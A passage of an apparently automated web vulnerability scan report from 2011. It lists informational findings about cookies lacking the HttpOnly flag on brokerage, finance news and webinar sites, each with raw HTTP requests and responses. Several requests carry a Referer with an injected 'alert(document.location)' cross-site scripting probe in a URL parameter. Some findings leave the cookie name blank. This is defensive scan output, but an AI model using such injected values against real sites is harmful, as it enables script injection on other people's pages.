Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 3628
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "602a83c682f0ca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery AutoTab plugin
* http://dev.lousyllama.com/auto-tab
*
* Copyright (c) 2007 Matthew Miller
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.
...[SNIP]...

10.51. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.scrollTo-min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID and TLTSID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.scrollTo-min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 2262
Content-Type: application/x-javascript
Last-Modified: Fri, 30 Apr 2010 20:54:50 GMT
Accept-Ranges: bytes
ETag: "f043f15fa7e8ca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/**
* jQuery.ScrollTo - Easy element scrolling using jQuery.
* Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
...[SNIP]...

10.52. https://account.optionsxpress.com/inc/newaccount/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/styles.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID and TLTSID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/styles.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 13213
Content-Type: text/css
Last-Modified: Tue, 23 Nov 2010 16:59:49 GMT
Accept-Ranges: bytes
ETag: "f74a6d62f8bcb1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*    
   Purpose:    Styles for the new account process. Shared for all sites.
   Created by: Shawn Roser
   Date:        2/9/2005
*/

/* Style Redefinitions */

/*body { background: #EBEBEB; text-align: ce
...[SNIP]...

10.53. https://account.optionsxpress.com/inc/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/s_code.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID and TLTSID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/s_code.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 40455
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Jun 2011 15:21:04 GMT
Accept-Ranges: bytes
ETag: "0b0f8832625cc1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* global JS methods */
Array.prototype.indexOf = function (obj) {
   for (var i = 0; i < this.length; i++) {
       if (this[i] == obj) return i;
   }
   return -1;
}
Array.prototype.has = function (obj)
...[SNIP]...

10.54. https://adwords.google.com/um/StartNewLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SAG (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Note that this Set-Cookie header expires the cookie (SAG=EXPIRED with Expires=Mon, 01-Jan-1990), i.e. it tells the browser to delete SAG rather than store a value, so the missing flag has no practical effect in this response.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 11
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Sep 2011 19:45:19 GMT
Expires: Thu, 08 Sep 2011 19:45:19 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

10.55. https://cwt1.interactivebrokers.com/webtrader2/servlet/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cwt1.interactivebrokers.com
Path:   /webtrader2/servlet/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: sk (see the Set-Cookie header in the response below; it carries the Secure attribute but not HttpOnly). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webtrader2/servlet/login HTTP/1.1
Host: cwt1.interactivebrokers.com
Connection: keep-alive
Referer: http://www.interactivebrokers.com/en/p.php?f=customerService&ib_entity=llc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282; XYZAB_AM.LOGIN=; XYZAB=; URL_PARAM=actiongetProps=getProps&language=en&propFile=SSO_Login_v1

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:54:15 GMT
Server: apache
Content-Language: en
Set-Cookie: sk=value:ibg-dark; Expires=Thu, 08-Sep-2011 22:26:56 GMT; Secure
Content-Length: 14515
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml'>

<head>


<!--
This software
...[SNIP]...

10.56. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: MwPhCom_degraded_status (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:51 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Pacer Adds LNG Trucks to Southern California Operations - Yahoo! Finan
...[SNIP]...

10.57. http://finance.yahoo.com/news/Piedmont-Natural-Gas-prnews-2212692382.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Piedmont-Natural-Gas-prnews-2212692382.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: MwPhCom_degraded_status (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/Piedmont-Natural-Gas-prnews-2212692382.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Piedmont Natural Gas Announces 3rd Quarter 2011 Earnings Conference Ca
...[SNIP]...

10.58. http://finance.yahoo.com/news/Primary-Petroleum-Present-iw-1675004773.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Primary-Petroleum-Present-iw-1675004773.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: MwPhCom_degraded_status (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/Primary-Petroleum-Present-iw-1675004773.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:51 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Primary Petroleum to Present at Rodman &amp; Renshaw Annual Global Inv
...[SNIP]...

10.59. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Retail-gasoline-prices-up-apf-2916275523.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: MwPhCom_degraded_status (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/Retail-gasoline-prices-up-apf-2916275523.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Retail gasoline prices up penny in Texas - Yahoo! Finance</title>
<
...[SNIP]...

10.60. http://finance.yahoo.com/news/US-Steel-converts-vehicles-to-apf-2954052497.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/US-Steel-converts-vehicles-to-apf-2954052497.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/US-Steel-converts-vehicles-to-apf-2954052497.html HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.20.7

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>US Steel converts vehicles to run on natural gas - Yahoo! Finance</tit
...[SNIP]...

10.61. https://icewebinar.webex.com/icewebinar/lsr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://icewebinar.webex.com
Path:   /icewebinar/lsr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icewebinar/lsr.php HTTP/1.1
Host: icewebinar.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:45:21 GMT
Server: Apache
Set-Cookie: galaxye_wl=R2995082818; path=/
Cache-Control: no-cache
Pragma: No-cache
Content-Length: 771
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close
Content-Type: text/html


<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="6">
<base href="https://icewebinar.webex.com/mw0306ld/mywebex/jsp/com
...[SNIP]...

10.62. https://interactivebrokers.webex.com/interactivebrokers/lsr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /interactivebrokers/lsr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interactivebrokers/lsr.php HTTP/1.1
Host: interactivebrokers.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:47:08 GMT
Server: Apache
Pragma: No-cache
Content-Length: 797
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: no-cache
Set-Cookie: NSC_kkkbwxm=0afc54500899;path=/
Connection: close
Content-Type: text/html


<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="5">
<base href="https://interactivebrokers.webex.com/mw0306lb/mywebex
...[SNIP]...

10.63. https://interactivebrokers.webex.com/interactivebrokers/onstage/g.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /interactivebrokers/onstage/g.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interactivebrokers/onstage/g.php HTTP/1.1
Host: interactivebrokers.webex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 08 Sep 2011 19:47:08 GMT
Server: Apache
Pragma: No-cache
Location: https://interactivebrokers.webex.com/mw0306lb/mywebex/default.do?nomenu=true&siteurl=interactivebrokers&service=6&main_url=https%3A%2F%2Finteractivebrokers.webex.com%2Fec0605lb%2Feventcenter%2Fevent%2FeventAction.do%3FtheAction%3Ddetail%26confViewID%3D-1%26siteurl%3Dinteractivebrokers%26%26%26
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: no-cache
Set-Cookie: NSC_kkkbwxm=0afc54500899;path=/
Connection: close
Content-Type: text/html
Content-Length: 935

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://interactivebrokers.webex.c
...[SNIP]...

10.64. http://pfgbest.app5.hubspot.com/salog.js.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pfgbest.app5.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: pfgbest.app5.hubspot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pfgbest.com/toolkit/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 498
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=zAFaJjSNzQEkAAAAYzgwZmFjNzAtY2NhNi00Y2Q1LWIxYzktMWRhNDE1NmVlYzM10; expires=Fri, 07-Sep-2012 20:05:38 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=69bbab87-dff5-41d5-86c5-94506c2c7a5d; domain=pfgbest.app5.hubspot.com; expires=Wed, 08-Sep-2021 05:00:00 GMT; path=/; HttpOnly
Date: Thu, 08 Sep 2011 20:05:38 GMT
Set-Cookie: HUBSPOT159=219223212.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 28461;
var hsWeekEndsIn = 287661;
var hsMonthEndsIn = 1929261;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-08 16:05
...[SNIP]...

10.65. http://rcv-srv20.inplay.tubemogul.com/StreamReceiver/services

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcv-srv20.inplay.tubemogul.com
Path:   /StreamReceiver/services

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /StreamReceiver/services HTTP/1.1
Host: rcv-srv20.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
Content-Length: 1000
Origin: http://ibkb.interactivebrokers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: text/xml; charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA

<?xml version="1.0" encoding="utf-8"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" xsi:schemaLocation="http://www.illumenix.com/StreamReceiver/services/schemas streamm
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _tmpi=MjAxMTA5MDg_MjotNTY3NTYzMzQyMTY5OTg1NzUxNzozMHwxNDotNTY3NTYzMzQyMTY5OTg1NzUxNzozMA; Domain=.tubemogul.com; Expires=Fri, 07-Sep-2012 19:54:09 GMT; Path=/
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close
Content-Length: 1334

<?xml version="1.0" encoding="UTF-8" standalone="no"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" version="2"><Response><PlayerUpdateResponse requestStatus="success"/
...[SNIP]...

10.66. http://receive.inplay.tubemogul.com/StreamReceiver/demo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /StreamReceiver/demo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /StreamReceiver/demo?segment=000&zip=&age=&gender= HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA; Domain=.tubemogul.com; Expires=Fri, 07-Sep-2012 19:54:09 GMT; Path=/
P3P: cp="NOI DSP COR LAW PSAo PSDo IVAo IVDo OUR BUS UNI DEM"
host: rcv-srv04
Content-Type: image/gif
Content-Length: 43
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.67. http://rtd.tubemogul.com/upi/pid/5w3jqr4k

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rtd.tubemogul.com
Path:   /upi/pid/5w3jqr4k

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /upi/pid/5w3jqr4k?puid=E1&tmid=-5675633421699857517 HTTP/1.1
Host: rtd.tubemogul.com
Proxy-Co